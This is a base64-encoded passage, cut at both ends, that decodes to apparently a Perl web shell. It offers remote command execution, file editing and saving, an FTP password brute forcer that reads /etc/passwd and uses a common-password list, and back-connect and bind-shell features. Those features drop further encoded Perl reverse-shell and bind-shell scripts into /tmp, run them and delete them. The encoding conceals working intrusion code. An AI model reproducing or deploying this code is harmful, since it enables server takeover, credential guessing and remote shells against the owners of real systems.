EeW5hbWljT3V0cHV0KSAjIHNob3cgb3V0cHV0IGFzIGl0IGlzIGdlbmVyYXRlZA0KCXsNCgkJJHw9MTsNCgkJJENvbW1hbmQgLj0gIiB8IjsNCgkJb3BlbihDb21tYW5kT3V0cHV0LCAkQ29tbWFuZCk7DQoJCXdoaWxlKDxDb21tYW5kT3V0cHV0PikNCgkJew0KCQkJJF8gPX4gcy8oXG58XHJcbikkLy87DQoJCQkkcmVzdWx0IC49ICZIdG1sU3BlY2lhbENoYXJzKCIkX1xuIik7DQoJCX0NCgkJJHw9MDsNCgl9DQoJZWxzZSAjIHNob3cgb3V0cHV0IGFmdGVyIGNvbW1hbmQgY29tcGxldGVzDQoJew0KCQkkcmVzdWx0IC49ICZIdG1sU3BlY2lhbENoYXJzKCRDb21tYW5kKTsNCgl9DQoJaWYoISRXaW5OVCkNCgl7DQoJCWFsYXJtKDApOw0KCX0NCglyZXR1cm4gJHJlc3VsdDsNCn0NCiM9PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT0NCiMgRm9ybSBTYXZlIEZpbGUgDQojPT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09DQpzdWIgU2F2ZUZpbGVGb3JtDQp7DQoJbXkgJHJlc3VsdCA9IiI7DQoJJEVuY29kZUN1cnJlbnREaXIgPSBFbmNvZGVEaXIoJEN1cnJlbnREaXIpOw0KCXN1YnN0cigkUnVuQ29tbWFuZCwwLDUpPSIiOw0KCW15ICRmaWxlPSZ0cmltKCRSdW5Db21tYW5kKTsNCgkkc2F2ZT0nPGJyPjxpbnB1dCBuYW1lPSJhIiB0eXBlPSJzdWJtaXQiIHZhbHVlPSJzYXZlIiA+JzsNCgkkRmlsZT0kQ3VycmVudERpci4kUGF0aFNlcC4kUnVuQ29tbWFuZDsNCglteSAkZGlyPSI8c3BhbiBzdHlsZT0nZm9udDogMTFwdCBWZXJkYW5hOyBmb250LXdlaWdodDogYm9sZDsnPiIuJkFkZExpbmtEaXIoImd1aSIpLiI8L3NwYW4+IjsNCglpZigtdyAkRmlsZSkNCgl7DQoJCSRyb3dzPSIyMyINCgl9ZWxzZQ0KCXsNCgkJJG1zZz0iPGJyPjxmb250IHN0eWxlPSdjb2xvcjogeWVsbG93OycgPiBDYW5uJ3Qgd3JpdGUgZmlsZSE8Zm9udD48YnI+IjsNCgkJJHJvd3M9IjIwIg0KCX0NCgkkUHJvbXB0ID0gJFdpbk5UID8gIiRkaXIgPiAiIDogIjxmb250IGNvbG9yPScjRkZGRkZGJz5bYWRtaW5cQCRTZXJ2ZXJOYW1lICRkaXJdXCQ8L2ZvbnQ+ICI7DQoJJFJ1bkNvbW1hbmQgPSAiZWRpdCAkUnVuQ29tbWFuZCI7DQoJJHJlc3VsdCAuPSAgPDxFTkQ7DQoJPGZvcm0gbmFtZT0iZiIgbWV0aG9kPSJQT1NUIiBhY3Rpb249IiRTY3JpcHRMb2NhdGlvbiI+DQoNCgk8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJkIiB2YWx1ZT0iJEVuY29kZUN1cnJlbnREaXIiPg0KCSRQcm9tcHQNCgk8aW5wdXQgdHlwZT0idGV4dCIgc2l6ZT0iNDAiIG5hbWU9ImMiPg0KCTxpbnB1dCBuYW1lPSJzIiB0eXBlPSJzdWJtaXQiIHZhbHVlPSJFbnRlciI+DQoJPGJyPkNvbW1hbmQ6IDxydW4+ICRSdW5Db21tYW5kIDwvcnVuPg0KCTxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImZpbGUiIHZhbHVlPSIkZmlsZSIgPiAkc2F2ZSA8YnI+ICRtc2cNCgk8YnI+PHRleHRhcmVhIGlkPSJkYXRhIiBuYW1lPSJkYXRhIiBjb2xzPSIkY29scyIgcm93cz0iJHJvd3MiIHNwZWxsY2hlY2s9ImZhbHNlIj4NCkVORA0KDQoJJHJlc3VsdCAuPSAmSHRtbFNwZWNpYWxDaGFycygmRmlsZU9wZW4oJEZpbGUsMCkpOw0KCSRyZXN1bHQgLj0gIjwvdGV4dGFyZWE+IjsNCgkkcmVzdWx0IC49ICI8L2Zvcm0+IjsNCglyZXR1cm4gJHJlc3VsdDsNCn0NCiM9PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT0NCiMgRmlsZSBPcGVuDQojPT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09DQpzdWIgRmlsZU9wZW4oJCl7DQoJbXkgJGZpbGUgPSBzaGlmdDsNCglteSAkYmluYXJ5ID0gc2hpZnQ7DQoJbXkgJHJlc3VsdCA9ICIiOw0KCW15ICRuID0gIiI7DQoJaWYoLWYgJGZpbGUpew0KCQlpZihvcGVuKEZJTEUsJGZpbGUpKXsNCgkJCWlmKCRiaW5hcnkpew0KCQkJCWJpbm1vZGUgRklMRTsNCgkJCX0NCgkJCXdoaWxlICgoJG4gPSByZWFkIEZJTEUsICRkYXRhLCAxMDI0KSAhPSAwKSB7DQoJCQkJJHJlc3VsdCAuPSAkZGF0YTsNCgkJCX0NCgkJCWNsb3NlKEZJTEUpOw0KCQl9DQoJfWVsc2UNCgl7DQoJCXJldHVybiAiTm90J3MgYSBGaWxlISI7DQoJfQ0KCXJldHVybiAkcmVzdWx0Ow0KfQ0KIz09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PQ0KIyBTYXZlIEZpbGUNCiM9PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT0NCnN1YiBTYXZlRmlsZSgkKQ0Kew0KCW15ICREYXRhPSBzaGlmdCA7DQoJbXkgJEZpbGU9IHNoaWZ0Ow0KCSRGaWxlPSRDdXJyZW50RGlyLiRQYXRoU2VwLiRGaWxlOw0KCWlmKG9wZW4oRklMRSwgIj4kRmlsZSIpKQ0KCXsNCgkJYmlubW9kZSBGSUxFOw0KCQlwcmludCBGSUxFICREYXRhOw0KCQljbG9zZSBGSUxFOw0KCQlyZXR1cm4gMTsNCgl9ZWxzZQ0KCXsNCgkJcmV0dXJuIDA7DQoJfQ0KfQ0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBCcnV0ZSBGb3JjZXIgRm9ybQ0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIEJydXRlRm9yY2VyRm9ybQ0Kew0KCW15ICRyZXN1bHQ9IiI7DQoJJHJlc3VsdCAuPSA8PEVORDsNCg0KPHRhYmxlPg0KDQo8dHI+DQo8dGQgY29sc3Bhbj0iMiIgYWxpZ249ImNlbnRlciI+DQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyM8YnI+DQpTaW1wbGUgRlRQIGJydXRlIGZvcmNlcjxicj4NCk5vdGU6IE9ubHkgc2NhbiBmcm9tIDEgdG8gMyB1c2VyIDotUzxicj4NCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KPGZvcm0gbmFtZT0iZiIgbWV0aG9kPSJQT1NUIiBhY3Rpb249IiRTY3JpcHRMb2NhdGlvbiI+DQoNCjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImEiIHZhbHVlPSJicnV0ZWZvcmNlciIvPg0KPC90ZD4NCjwvdHI+DQo8dHI+DQo8dGQ+VXNlcjo8YnI+PHRleHRhcmVhIHJvd3M9IjE4IiBjb2xzPSIzMCIgbmFtZT0idXNlciI+DQpFTkQNCmNob3AoJHJlc3VsdCAuPSBgbGVzcyAvZXRjL3Bhc3N3ZCB8IGN1dCAtZDogLWYxYCk7DQokcmVzdWx0IC49IDw8J0VORCc7DQo8L3RleHRhcmVhPjwvdGQ+DQo8dGQ+DQoNClBhc3M6PGJyPg0KPHRleHRhcmVhIHJvd3M9IjE4IiBjb2xzPSIzMCIgbmFtZT0icGFzcyI+MTIzcGFzcw0KMTIzIUAjDQoxMjNhZG1pbg0KMTIzYWJjDQoxMjM0NTZhZG1pbg0KMTIzNDU1NDMyMQ0KMTIzNDQzMjENCnBhc3MxMjMNCmFkbWluDQphZG1pbmNwDQphZG1pbmlzdHJhdG9yDQptYXRraGF1DQpwYXNzYWRtaW4NCnBAc3N3b3JkDQpwQHNzdzByZA0KcGFzc3dvcmQNCjEyMzQ1Ng0KMTIzNDU2Nw0KMTIzNDU2NzgNCjEyMzQ1Njc4OQ0KMTIzNDU2Nzg5MA0KMTExMTExDQowMDAwMDANCjIyMjIyMg0KMzMzMzMzDQo0NDQ0NDQNCjU1NTU1NQ0KNjY2NjY2DQo3Nzc3NzcNCjg4ODg4OA0KOTk5OTk5DQoxMjMxMjMNCjIzNDIzNA0KMzQ1MzQ1DQo0NTY0NTYNCjU2NzU2Nw0KNjc4Njc4DQo3ODk3ODkNCjEyMzMyMQ0KNDU2NjU0DQo2NTQzMjENCjc2NTQzMjENCjg3NjU0MzIxDQo5ODc2NTQzMjENCjA5ODc2NTQzMjENCmFkbWluMTIzDQphZG1pbjEyMzQ1Ng0KYWJjZGVmDQphYmNhYmMNCiFAIyFAIw0KIUAjJCVeDQohQCMkJV4mKigNCiFAIyQkI0AhDQphYmMxMjMNCmFuaHlldWVtDQppbG92ZXlvdTwvdGV4dGFyZWE+DQo8L3RkPg0KPC90cj4NCjx0cj4NCjx0ZCBjb2xzcGFuPSIyIiBhbGlnbj0iY2VudGVyIj4NClNsZWVwOjxzZWxlY3QgbmFtZT0ic2xlZXAiPg0KDQo8b3B0aW9uPjA8L29wdGlvbj4NCjxvcHRpb24+MTwvb3B0aW9uPg0KPG9wdGlvbj4yPC9vcHRpb24+DQoNCjxvcHRpb24+Mzwvb3B0aW9uPg0KPC9zZWxlY3Q+IA0KPGlucHV0IHR5cGU9InN1Ym1pdCIgdmFsdWU9IkJydXRlIEZvcmNlciIvPjwvdGQ+PC90cj4NCjwvZm9ybT4NCjwvdGFibGU+DQpFTkQNCnJldHVybiAkcmVzdWx0Ow0KfQ0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBCcnV0ZSBGb3JjZXINCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBCcnV0ZUZvcmNlcg0Kew0KCW15ICRyZXN1bHQ9IiI7DQoJJFNlcnZlcj0kRU5WeydTRVJWRVJfQUREUid9Ow0KCWlmKCRpbnsndXNlcid9IGVxICIiKQ0KCXsNCgkJJHJlc3VsdCAuPSAmQnJ1dGVGb3JjZXJGb3JtOw0KCX1lbHNlDQoJew0KCQl1c2UgTmV0OjpGVFA7IA0KCQlAdXNlcj0gc3BsaXQoL1xuLywgJGlueyd1c2VyJ30pOw0KCQlAcGFzcz0gc3BsaXQoL1xuLywgJGlueydwYXNzJ30pOw0KCQljaG9tcChAdXNlcik7DQoJCWNob21wKEBwYXNzKTsNCgkJJHJlc3VsdCAuPSAiPGJyPjxicj5bK10gVHJ5aW5nIGJydXRlICRTZXJ2ZXJOYW1lPGJyPj09PT09PT09PT09PT09PT09PT09Pj4+Pj4+Pj4+Pj4+PDw8PDw8PDw8PD09PT09PT09PT09PT09PT09PT09PGJyPjxicj5cbiI7DQoJCWZvcmVhY2ggJHVzZXJuYW1lIChAdXNlcikNCgkJew0KCQkJaWYoJHVzZXJuYW1lIG5lICIiKQ0KCQkJew0KCQkJCWZvcmVhY2ggJHBhc3N3b3JkIChAcGFzcykNCgkJCQl7DQoJCQkJCSRmdHAgPSBOZXQ6OkZUUC0+bmV3KCRTZXJ2ZXIpIG9yIGRpZSAiQ291bGQgbm90IGNvbm5lY3QgdG8gJFNlcnZlck5hbWVcbiI7IA0KCQkJCQlpZigkZnRwLT5sb2dpbigiJHVzZXJuYW1lIiwiJHBhc3N3b3JkIikpDQoJCQkJCXsNCgkJCQkJCSRyZXN1bHQgLj0gIjxhIHRhcmdldD0nX2JsYW5rJyBocmVmPSdmdHA6Ly8kdXNlcm5hbWU6JHBhc3N3b3JkXEAkU2VydmVyJz5bK10gZnRwOi8vJHVzZXJuYW1lOiRwYXNzd29yZFxAJFNlcnZlcjwvYT48YnI+XG4iOw0KCQkJCQkJJGZ0cC0+cXVpdCgpOw0KCQkJCQkJYnJlYWs7DQoJCQkJCX0NCgkJCQkJaWYoJGlueydzbGVlcCd9IG5lICIwIikNCgkJCQkJew0KCQkJCQkJc2xlZXAoaW50KCRpbnsnc2xlZXAnfSkgKiAxMDAwKTsNCgkJCQkJfQ0KCQkJCQkkZnRwLT5xdWl0KCk7DQoJCQkJfQ0KCQkJfQ0KCQl9DQoJCSRyZXN1bHQgLj0gIlxuPGJyPj09PT09PT09PT0+Pj4+Pj4+Pj4+IEZpbmlzaGVkIDw8PDw8PDw8PDw9PT09PT09PT09PGJyPlxuIjsNCgl9DQoJcmV0dXJuICRyZXN1bHQ7DQp9DQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIEJhY2tjb25uZWN0IEZvcm0NCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBCYWNrQmluZEZvcm0NCnsNCglyZXR1cm4gPDxFTkQ7DQoJPGJyPjxicj4NCg0KCTx0YWJsZT4NCgk8dHI+DQoJPGZvcm0gbmFtZT0iZiIgbWV0aG9kPSJQT1NUIiBhY3Rpb249IiRTY3JpcHRMb2NhdGlvbiI+DQoJPHRkPkJhY2tDb25uZWN0OiA8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJhIiB2YWx1ZT0iYmFja2JpbmQiPjwvdGQ+DQoJPHRkPiBIb3N0OiA8aW5wdXQgdHlwZT0idGV4dCIgc2l6ZT0iMjAiIG5hbWU9ImNsaWVudGFkZHIiIHZhbHVlPSIkRU5WeydSRU1PVEVfQUREUid9Ij4NCgkgUG9ydDogPGlucHV0IHR5cGU9InRleHQiIHNpemU9IjYiIG5hbWU9ImNsaWVudHBvcnQiIHZhbHVlPSI4MCIgb25rZXl1cD0iZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoJ2JhJykuaW5uZXJIVE1MPXRoaXMudmFsdWU7Ij48L3RkPg0KDQoJPHRkPjxpbnB1dCBuYW1lPSJzIiB0eXBlPSJzdWJtaXQiIG5hbWU9InN1Ym1pdCIgdmFsdWU9IkNvbm5lY3QiPjwvdGQ+DQoJPC9mb3JtPg0KCTwvdHI+DQoJPHRyPg0KCTx0ZCBjb2xzcGFuPTM+PGZvbnQgY29sb3I9I0ZGRkZGRj5bK10gQ2xpZW50IGxpc3RlbiBiZWZvcmUgY29ubmVjdCBiYWNrIQ0KCTxicj5bK10gVHJ5IGNoZWNrIHlvdXIgUG9ydCB3aXRoIDxhIHRhcmdldD0iX2JsYW5rIiBocmVmPSJodHRwOi8vd3d3LmNhbnlvdXNlZW1lLm9yZy8iPmh0dHA6Ly93d3cuY2FueW91c2VlbWUub3JnLzwvYT4NCgk8YnI+WytdIENsaWVudCBsaXN0ZW4gd2l0aCBjb21tYW5kOiA8cnVuPm5jIC12diAtbCAtcCA8c3BhbiBpZD0iYmEiPjgwPC9zcGFuPjwvcnVuPjwvZm9udD48L3RkPg0KDQoJPC90cj4NCgk8L3RhYmxlPg0KDQoJPGJyPjxicj4NCgk8dGFibGU+DQoJPHRyPg0KCTxmb3JtIG1ldGhvZD0iUE9TVCIgYWN0aW9uPSIkU2NyaXB0TG9jYXRpb24iPg0KCTx0ZD5CaW5kIFBvcnQ6IDxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImEiIHZhbHVlPSJiYWNrYmluZCI+PC90ZD4NCg0KCTx0ZD4gUG9ydDogPGlucHV0IHR5cGU9InRleHQiIHNpemU9IjE1IiBuYW1lPSJjbGllbnRwb3J0IiB2YWx1ZT0iMTQxMiIgb25rZXl1cD0iZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoJ2JpJykuaW5uZXJIVE1MPXRoaXMudmFsdWU7Ij4NCg0KCSBQYXNzd29yZDogPGlucHV0IHR5cGU9InRleHQiIHNpemU9IjEyIiBuYW1lPSJiaW5kcGFzcyIgdmFsdWU9InZpbmFraWQiPjwvdGQ+DQoJPHRkPjxpbnB1dCBuYW1lPSJzIiB0eXBlPSJzdWJtaXQiIG5hbWU9InN1Ym1pdCIgdmFsdWU9IkJpbmQiPjwvdGQ+DQoJPC9mb3JtPg0KCTwvdHI+DQoJPHRyPg0KCTx0ZCBjb2xzcGFuPTM+PGZvbnQgY29sb3I9I0ZGRkZGRj5bK10gVGVzdGluZyAuLi4uDQoJPGJyPlsrXSBUcnkgY29tbWFuZDogPHJ1bj5uYyAkRU5WeydTRVJWRVJfQUREUid9IDxzcGFuIGlkPSJiaSI+MTQxMjwvc3Bhbj48L3J1bj48L2ZvbnQ+PC90ZD4NCg0KCTwvdHI+DQoJPC90YWJsZT48YnI+DQpFTkQNCn0NCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMgQmFja2Nvbm5lY3QgdXNlIHBlcmwNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBCYWNrQmluZA0Kew0KCXVzZSBTb2NrZXQ7CQ0KCSRiYWNrcGVybD0iSXlFdmRYTnlMMkpwYmk5d1pYSnNEUXAxYzJVZ1NVODZPbE52WTJ0bGREc05DaVJUYUdWc2JBazlJQ0l2WW1sdUwySmhjMmdpT3cwS0pFRlNSME05UUVGU1IxWTdEUXAxYzJVZ1UyOWphMlYwT3cwS2RYTmxJRVpwYkdWSVlXNWtiR1U3RFFwemIyTnJaWFFvVTA5RFMwVlVMQ0JRUmw5SlRrVlVMQ0JUVDBOTFgxTlVVa1ZCVFN3Z1oyVjBjSEp2ZEc5aWVXNWhiV1VvSW5SamNDSXBLU0J2Y2lCa2FXVWdjSEpwYm5RZ0lsc3RYU0JWYm1GaWJHVWdkRzhnVW1WemIyeDJaU0JJYjNOMFhHNGlPdzBLWTI5dWJtVmpkQ2hUVDBOTFJWUXNJSE52WTJ0aFpHUnlYMmx1S0NSQlVrZFdXekZkTENCcGJtVjBYMkYwYjI0b0pFRlNSMVpiTUYwcEtTa2diM0lnWkdsbElIQnlhVzUwSUNKYkxWMGdWVzVoWW14bElIUnZJRU52Ym01bFkzUWdTRzl6ZEZ4dUlqc05DbkJ5YVc1MElDSkRiMjV1WldOMFpXUWhJanNOQ2xOUFEwdEZWQzArWVhWMGIyWnNkWE5vS0NrN0RRcHZjR1Z1S0ZOVVJFbE9MQ0FpUGlaVFQwTkxSVlFpS1RzTkNtOXdaVzRvVTFSRVQxVlVMQ0krSmxOUFEwdEZWQ0lwT3cwS2IzQmxiaWhUVkVSRlVsSXNJajRtVTA5RFMwVlVJaWs3RFFwd2NtbHVkQ0FpTFMwOVBTQkRiMjV1WldOMFpXUWdRbUZqYTJSdmIzSWdQVDB0TFNBZ1hHNWNiaUk3RFFwemVYTjBaVzBvSW5WdWMyVjBJRWhKVTFSR1NVeEZPeUIxYm5ObGRDQlRRVlpGU0VsVFZDQTdaV05vYnlBbld5dGRJRk41YzNSbGJXbHVabTg2SUNjN0lIVnVZVzFsSUMxaE8yVmphRzg3WldOb2J5QW5XeXRkSUZWelpYSnBibVp2T2lBbk95QnBaRHRsWTJodk8yVmphRzhnSjFzclhTQkVhWEpsWTNSdmNuazZJQ2M3SUhCM1pEdGxZMmh2T3lCbFkyaHZJQ2RiSzEwZ1UyaGxiR3c2SUNjN0pGTm9aV3hzSWlrN0RRcGpiRzl6WlNCVFQwTkxSVlE3IjsNCgkkYmluZHBlcmw9Ikl5RXZkWE55TDJKcGJpOXdaWEpzRFFwMWMyVWdVMjlqYTJWME93MEtKRUZTUjBNOVFFRlNSMVk3RFFva2NHOXlkQWs5SUNSQlVrZFdXekJkT3cwS0pIQnliM1J2Q1QwZ1oyVjBjSEp2ZEc5aWVXNWhiV1VvSjNSamNDY3BPdzBLSkZOb1pXeHNDVDBnSWk5aWFXNHZZbUZ6YUNJN0RRcHpiMk5yWlhRb1UwVlNWa1ZTTENCUVJsOUpUa1ZVTENCVFQwTkxYMU5VVWtWQlRTd2dKSEJ5YjNSdktXOXlJR1JwWlNBaWMyOWphMlYwT2lRaElqc05Dbk5sZEhOdlkydHZjSFFvVTBWU1ZrVlNMQ0JUVDB4ZlUwOURTMFZVTENCVFQxOVNSVlZUUlVGRVJGSXNJSEJoWTJzb0ltd2lMQ0F4S1NsdmNpQmthV1VnSW5ObGRITnZZMnR2Y0hRNklDUWhJanNOQ21KcGJtUW9VMFZTVmtWU0xDQnpiMk5yWVdSa2NsOXBiaWdrY0c5eWRDd2dTVTVCUkVSU1gwRk9XU2twYjNJZ1pHbGxJQ0ppYVc1a09pQWtJU0k3RFFwc2FYTjBaVzRvVTBWU1ZrVlNMQ0JUVDAxQldFTlBUazRwQ1FsdmNpQmthV1VnSW14cGMzUmxiam9nSkNFaU93MEtabTl5S0RzZ0pIQmhaR1J5SUQwZ1lXTmpaWEIwS0VOTVNVVk9WQ3dnVTBWU1ZrVlNLVHNnWTJ4dmMyVWdRMHhKUlU1VUtRMEtldzBLQ1c5d1pXNG9VMVJFU1U0c0lDSStKa05NU1VWT1ZDSXBPdzBLQ1c5d1pXNG9VMVJFVDFWVUxDQWlQaVpEVEVsRlRsUWlLVHNOQ2dsdmNHVnVLRk5VUkVWU1Vpd2dJajRtUTB4SlJVNVVJaWs3RFFvSmMzbHpkR1Z0S0NKMWJuTmxkQ0JJU1ZOVVJrbE1SVHNnZFc1elpYUWdVMEZXUlVoSlUxUWdPMlZqYUc4Z0oxc3JYU0JUZVhOMFpXMXBibVp2T2lBbk95QjFibUZ0WlNBdFlUdGxZMmh2TzJWamFHOGdKMXNyWFNCVmMyVnlhVzVtYnpvZ0p6c2dhV1E3WldOb2J6dGxZMmh2SUNkYksxMGdSR2x5WldOMGIzSjVPaUFuT3lCd2QyUTdaV05vYnpzZ1pXTm9ieUFuV3l0ZElGTm9aV3hzT2lBbk95UlRhR1ZzYkNJcE93MEtDV05zYjNObEtGTlVSRWxPS1RzTkNnbGpiRzl6WlNoVFZFUlBWVlFwT3cwS0NXTnNiM05sS0ZOVVJFVlNVaWs3RFFwOURRbz0iOw0KDQoJJENsaWVudEFkZHIgPSAkaW57J2NsaWVudGFkZHInfTsNCgkkQ2xpZW50UG9ydCA9IGludCgkaW57J2NsaWVudHBvcnQnfSk7DQoJaWYoJENsaWVudFBvcnQgZXEgMCkNCgl7DQoJCXJldHVybiAmQmFja0JpbmRGb3JtOw0KCX1lbHNpZighJENsaWVudEFkZHIgZXEgIiIpDQoJew0KCQkkRGF0YT1kZWNvZGVfYmFzZTY0KCRiYWNrcGVybCk7DQoJCWlmKC13ICIvdG1wLyIpDQoJCXsNCgkJCSRGaWxlPSIvdG1wL2JhY2tjb25uZWN0LnBsIjsJDQoJCX1lbHNlDQoJCXsNCgkJCSRGaWxlPSRDdXJyZW50RGlyLiRQYXRoU2VwLiJiYWNrY29ubmVjdC5wbCI7DQoJCX0NCgkJb3BlbihGSUxFLCAiPiRGaWxlIik7DQoJCXByaW50IEZJTEUgJERhdGE7DQoJCWNsb3NlIEZJTEU7DQoJCXN5c3RlbSgicGVybCAkRmlsZSAkQ2xpZW50QWRkciAkQ2xpZW50UG9ydCIpOw0KCQl1bmxpbmsoJEZpbGUpOw0KCQlleGl0IDA7DQoJfWVsc2UNCgl7DQoJCSREYXRhPWRlY29kZV9iYXNlNjQoJGJpbmRwZXJsKTsNCgkJaWYoLXcgIi90bXAiKQ0KCQl7DQoJCQkkRmlsZT0iL3RtcC9iaW5kcG9ydC5wbCI7CQ0KCQl9ZWxzZQ0KCQl7DQoJCQkkRmlsZT0kQ3VycmVudERpci4kUGF0aFNlcC4iYmluZHBvcnQucGwiOw0KCQl9DQoJCW9wZW4oRklMRSwgIj4kRmlsZSIpOw0KCQlwcmludCBGSUxFICREYXRhOw0KCQljbG9zZSBGSUxFOw0KCQlzeXN0ZW0oInBlcmwgJEZpbGUgJENsaWVudFBvcnQiKTsNCgkJdW5saW5rKCRGaWxlKTsNCgkJZXhpdCAwOw0KCX0NCn0NCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMgIEFycmF5IExpc3QgRGlyZWN0b3J5DQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgUm1EaXIoJCkgDQp7DQoJbXkgJGRpciA9IHNoaWZ0Ow0KCWlmKG9wZW5kaXIoRElSLCRkaXIpKQ0KCXsNCgkJd2hpbGUoJGZpbGUgPSByZWFkZGlyKERJUikpDQoJCXsNCgkJCWlmKCgkZmlsZSBuZSAiLiIpICYmICgkZmlsZSBuZSAiLi4iKSkNCgkJCXsNCgkJCQkkZmlsZT0gJGRpci4kUGF0aFNlcC4kZmlsZTsNCgkJCQlpZigtZCAkZmlsZSkNCgkJCQl7DQoJCQkJCSZSbURpcigkZmlsZSk7DQoJCQkJfQ0KCQkJCWVsc2UNCgkJCQl7DQoJCQkJCXVubGluaygkZmlsZSk7DQoJCQkJfQ0KCQkJfQ0KCQl9DQoJCWNsb3NlZGlyKERJUik7DQoJfQ0KfQ0Kc3ViIEZpbGVPd25lcigkKQ0Kew0KCW15ICRmaWxlID0gc2hpZnQ7DQoJaWYoLWUgJGZpbGUpDQoJew0KCQkoJHVpZCwkZ2lkKSA9IChzdGF0KCRmaWxlKSlbNCw1XTsNCgkJaWYoJFdpbk5UKQ0KCQl7DQoJCQlyZXR1cm4gIj8/PyI7DQoJCX0NCgkJZWxzZQ0KCQl7DQoJCQkkbmFtZT1nZXRwd3VpZCgkdWlkKTsNCgkJCSRncm91cD1nZXRncmdpZCgkZ2lkKTsNCgkJCXJldHVybiAkbmFtZS4iLyIuJGdyb3VwOw0KCQl9DQoJfQ0KCXJldHVybiAiPz8/IjsNCn0NCnN1YiBQYXJlbnRGb2xkZXIoJCkNCnsNCglteSAkcGF0aCA9IHNoaWZ0Ow0KCW15ICRDb21tID0gImNkIFwiJEN1cnJlbnREaXJcIiIuJENtZFNlcC4iY2QgLi4iLiRDbWRTZXAuJENtZFB3ZDsNCgljaG9wKCRwYXRoID0gYCRDb21tYCk7DQoJcmV0dXJuICRwYXRoOw0KfQ0Kc3ViIEZpbGVQZXJtcygkKQ0Kew0KCW15ICRmaWxlID0gc2hpZnQ7DQoJbXkgJHVyID0gIi0iOw0KCW15ICR1dyA9ICItIjsNCglpZigtZSAkZmlsZSkNCgl7DQoJCWlmKCRXaW5OVCkNCgkJew0KCQkJaWYoLXIgJGZpbGUpeyAkdXIgPSAiciI7IH0NCgkJCWlmKC13ICRmaWxlKXsgJHV3ID0gInciOyB9DQoJCQlyZXR1cm4gJHVyIC4gIiAvICIgLiAkdXc7DQoJCX1lbHNlDQoJCXsNCgkJCSRtb2RlPShzdGF0KCRmaWxlKSlbMl07DQoJCQkkcmVzdWx0ID0gc3ByaW50ZigiJTA0byIsICRtb2RlICYgMDc3NzcpOw0KCQkJcmV0dXJuICRyZXN1bHQ7DQoJCX0NCgl9DQoJcmV0dXJuICIwMDAwIjsNCn0NCnN1YiBGaWxlTGFzdE1vZGlmaWVkKCQpDQp7DQoJbXkgJGZpbGUgPSBzaGlmdDsNCglpZigtZSAkZmlsZSkNCgl7DQoJCSgkbGEpID0gKHN0YXQoJGZpbGUpKVs5XTsNCgkJKCRkLCRtLCR5LCRoLCRpKSA9IChsb2NhbHRpbWUoJGxhKSlbMyw0LDUsMiwxXTsNCgkJJHkgPSAkeSArIDE5MDA7DQoJCUBtb250aCA9IHF3LzEgMiAzIDQgNSA2IDcgOCA5IDEwIDExIDEyLzsNCgkJJGxtdGltZSA9IHNwcmludGYoIiUwMmQvJXMvJTRkICUwMmQ6JTAyZCIsJGQsJG1vbnRoWyRtXSwkeSwkaCwkaSk7DQoJCXJldHVybiAkbG10aW1lOw0KCX0NCglyZXR1cm4gIj8/PyI7DQp9DQpzdWIg